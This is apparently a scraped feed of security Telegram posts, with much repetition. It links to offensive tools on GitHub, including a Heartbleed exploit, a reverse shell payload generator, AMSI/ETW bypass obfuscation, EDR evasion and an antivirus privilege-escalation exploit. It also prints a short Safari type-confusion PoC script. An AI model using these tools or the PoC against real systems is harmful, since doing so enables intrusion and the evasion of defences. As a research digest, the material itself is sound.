Wi-Fi Surveyor
Visualize Wi-Fi signal strength over a geographic area.
https://github.com/ecoAPM/WiFiSurveyor
Visualize Wi-Fi signal strength over a geographic area.
https://github.com/ecoAPM/WiFiSurveyor
GitHub
GitHub - ecoAPM/WiFiSurveyor: Visualize Wi-Fi signal strength over a geographic area
Visualize Wi-Fi signal strength over a geographic area - ecoAPM/WiFiSurveyor
Forwarded from Cyber security intelligent program
Happy
Please open Telegram to view this post
VIEW IN TELEGRAM
CrimeFlare - This tool can help you to see the real IP behind CloudFlare protected websites.
https://github.com/zidansec/CrimeFlare
https://github.com/zidansec/CrimeFlare
GitHub
zidansec/CrimeFlare
This tool can help you to see the real IP behind CloudFlare protected websites. - zidansec/CrimeFlare
FCracker - is a command-line tool designed to brute force encrypted files like zip, 7z, rar, pdf, gpg etc.
▪️https://github.com/TarunYenni/FCracker
▪️https://github.com/TarunYenni/FCracker
Heartbleed vulnerability exploited🩸
▪️https://github.com/Saiprasad16/Heartbleed
#hackgit #github #soft #Heartbleed
▪️https://github.com/Saiprasad16/Heartbleed
#hackgit #github #soft #Heartbleed
GitHub
GitHub - Saiprasad16/Heartbleed: Heartbleed vulnerability exploited 🩸
Heartbleed vulnerability exploited 🩸. Contribute to Saiprasad16/Heartbleed development by creating an account on GitHub.
rsGen - Reverse Shell Payload Generator
▪️https://github.com/FlyfishSec/rsGen
#hackgit #github #Shell #rsGen #Reverse
▪️https://github.com/FlyfishSec/rsGen
#hackgit #github #Shell #rsGen #Reverse
GitHub
GitHub - FlyfishSec/rsGen: rsGen is a Reverse Shell Payload Generator for hacking.
rsGen is a Reverse Shell Payload Generator for hacking. - GitHub - FlyfishSec/rsGen: rsGen is a Reverse Shell Payload Generator for hacking.
#Analytics
#Malware_analysis
1. Ransomware Business Models: Future Pivots and Trends
https://www.trendmicro.com/en_us/research/22/l/ransomware-business-models-future-trends.html
2. SentinelSneak: Malicious PyPI module poses as security software development kit
https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
#Malware_analysis
1. Ransomware Business Models: Future Pivots and Trends
https://www.trendmicro.com/en_us/research/22/l/ransomware-business-models-future-trends.html
2. SentinelSneak: Malicious PyPI module poses as security software development kit
https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
Trend Micro
Ransomware Business Models: Future Pivots and Trends
Ransomware groups and their business models are expected to change from what and how we know it to date. In this blog entry, we summarize from some of our insights the triggers that spark the small changes in the short term (“evolutions”) and the bigger deviations…
VTI_Cheatsheet.pdf
946.6 KB
#Infographics
"VT Intelligence Cheat Sheet", 2022.
"VT Intelligence Cheat Sheet", 2022.
#tools
#Offensive_security
1. Shennina - Automating Host Exploitation with AI
https://github.com/mazen160/shennina
2. AMSI-bypass obfuscation + ETW-block obfuscation + powershell command obfuscation
https://github.com/H4de5-7/powershell-obfuscation
#Offensive_security
1. Shennina - Automating Host Exploitation with AI
https://github.com/mazen160/shennina
2. AMSI-bypass obfuscation + ETW-block obfuscation + powershell command obfuscation
https://github.com/H4de5-7/powershell-obfuscation
GitHub
GitHub - mazen160/shennina: Automating Host Exploitation with AI
Automating Host Exploitation with AI. Contribute to mazen160/shennina development by creating an account on GitHub.
#exploit
1. MeshyJSON:
A TP-Link tdpServer JSON Stack Overflow
https://research.nccgroup.com/2022/12/19/meshyjson-a-tp-link-tdpserver-json-stack-overflow
2. [Google VRP] Hijacking Google Docs Screenshots
https://blog.geekycat.in/google-vrp-hijacking-your-screenshots
1. MeshyJSON:
A TP-Link tdpServer JSON Stack Overflow
https://research.nccgroup.com/2022/12/19/meshyjson-a-tp-link-tdpserver-json-stack-overflow
2. [Google VRP] Hijacking Google Docs Screenshots
https://blog.geekycat.in/google-vrp-hijacking-your-screenshots
#Red_Team_Tactics
1. Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
https://cymulate.com/blog/blindside-a-new-technique-for-edr-evasion-with-hardware-breakpoints
2. Raw sockets hacking
https://antonio-cooler.gitbook.io/coolervoid-tavern/port-knocking-from-the-scratch
]-> Secure shell using port Knocking technique with AES256-GCM: https://github.com/CoolerVoid/ninja_shell
1. Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
https://cymulate.com/blog/blindside-a-new-technique-for-edr-evasion-with-hardware-breakpoints
2. Raw sockets hacking
https://antonio-cooler.gitbook.io/coolervoid-tavern/port-knocking-from-the-scratch
]-> Secure shell using port Knocking technique with AES256-GCM: https://github.com/CoolerVoid/ninja_shell
Cymulate
Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
Cymulate researchers have discovered a new vulnerability and created a proof of concept. The technique based on it allows attackers to circumvent many EDR vendors.
ZoneAlarmEoP
Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV
https://github.com/Wh04m1001/ZoneAlarmEoP
Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV
https://github.com/Wh04m1001/ZoneAlarmEoP
🔥🔥🔥Type confusion vulnerability(CVE-2022-42823) exists in the Apple Safari JSC Inspector(Root Cause Analysis + PoC).
A Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.
PoC:
<script>
let object = {};
Object.prototype.__defineSetter__('type', function() {
object.x = {};
object[0] = object.x;
});
</script>
🛡Fixed in: macOS 13, tvOS 16.1, iOS 16.1 & iPadOS 16, Safari 16.1, watchOS 9.1.
A Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.
PoC:
<script>
let object = {};
Object.prototype.__defineSetter__('type', function() {
object.x = {};
object[0] = object.x;
});
</script>
🛡Fixed in: macOS 13, tvOS 16.1, iOS 16.1 & iPadOS 16, Safari 16.1, watchOS 9.1.